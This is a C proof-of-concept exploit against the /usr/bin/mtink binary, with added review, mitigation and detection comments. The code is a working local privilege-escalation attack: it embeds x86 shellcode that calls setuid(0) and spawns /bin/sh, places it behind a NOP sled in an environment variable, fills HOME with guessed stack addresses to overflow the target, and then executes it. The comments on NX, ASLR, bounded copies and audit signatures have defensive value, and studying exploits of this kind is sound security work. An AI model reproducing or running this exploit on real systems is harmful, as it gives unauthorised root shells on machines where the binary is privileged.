//icesk! whats up
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
// Payload and staging buffers for a local proof-of-concept aimed at
// /usr/bin/mtink (the binary that main() executes).
//
// The bytes below decode as 32-bit x86 Linux code using int 0x80:
// syscall 0x17 (setuid) with ebx = 0, then syscall 0x0b (execve) on the
// "/bin/sh" string appended to the array, then syscall 1 (exit).
// The leading setuid(0) only has an effect if the target runs with elevated
// privileges -- presumably mtink was installed setuid root; confirm on the
// affected system.
//
// Defender notes: the technique depends on executing bytes stored in the
// process environment (stack memory) and on guessing a stack address.
// A non-executable stack (NX) addresses the first dependency and ASLR the
// second; stack protectors address the return-address overwrite itself.
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
// Size of the value exported as HOME.
#define bsize 1400
// Holds the HOME value. main() writes only the first bsize-4 bytes; the last
// 4 stay zero because the array has static storage, which terminates the string.
char buffer[bsize];
// Holds the value exported as the "shellcode" variable: 0x90 filler with the
// payload copied to the end.
char shel[2000];
// Copies %esp into %eax (32-bit x86, AT&T syntax) so the caller receives this
// process's current stack pointer.
// NOTE(review): there is no return statement. The value reaches the caller
// only because %eax is the i386 return register and the compiler happens not
// to overwrite it; in C this is undefined behaviour, and the asm statement
// declares no outputs or clobbers. Will not build for non-x86 targets.
char *get_sp() {
asm("movl %esp, %eax");
}
// Entry point: builds two environment variables and then executes
// /usr/bin/mtink so that it inherits them.
//   HOME      - up to bsize-4 bytes of one repeated 4-byte address
//               (get_sp() - off)
//   shellcode - 0x90 filler with the payload copied to the end
// v[1], if given, is parsed with atoi() as the offset subtracted from this
// process's stack pointer. On success execl() does not return.
//
// What this implies about the target (inferred, not shown in this file):
// mtink presumably copies $HOME into a fixed-size stack buffer without a
// length check. The fix on that side is a bounded copy that rejects an
// over-long HOME, and not installing the binary with privileges it does not
// need.
int main(int n, char **v) {
int i, off, align;
// align is fixed at 0, so the 0x41 padding loop below never executes.
align = 0;
// NOTE(review): off stays uninitialized when no argument is passed, and
// atoi() reports no parse errors; the address computed below is then
// undefined.
if (n > 1) off = atoi(v[1]); //nice code!
for(i=0;i<align;i++) buffer[i] = 0x41;
// Stores the same guessed address every 4 bytes; assumes 4-byte pointers
// (32-bit build). A zero byte inside the address would end the string early.
for(i=align;i<(bsize-4);i+=4) *(char **)&buffer[i] = get_sp()-off;
// Detection hint: a HOME value of roughly 1.4 KB of repeating 4-byte
// patterns is far outside anything a real path looks like and is visible in
// execve/environment auditing of privileged binaries.
setenv("HOME", buffer, 1);
// NOTE(review): memset() and strlen() are used without <string.h>, so they
// are implicitly declared here.
memset(shel, 0x90, 2000);
// The last payload byte lands at shel[1999].
// NOTE(review): that leaves no NUL inside shel, so setenv() reads past the
// end of the array (out-of-bounds read).
for(i=0;i<strlen(shellcode);i++) shel[(i+2000-strlen(shellcode))]=shellcode[i];
// Detection hint: an environment variable consisting mostly of 0x90 bytes is
// a long-standing signature for this class of proof-of-concept.
setenv("shellcode", shel, 1);
// Replaces this process with the target, which inherits the environment
// prepared above.
execl("/usr/bin/mtink", "/usr/bin/mtink", 0);
}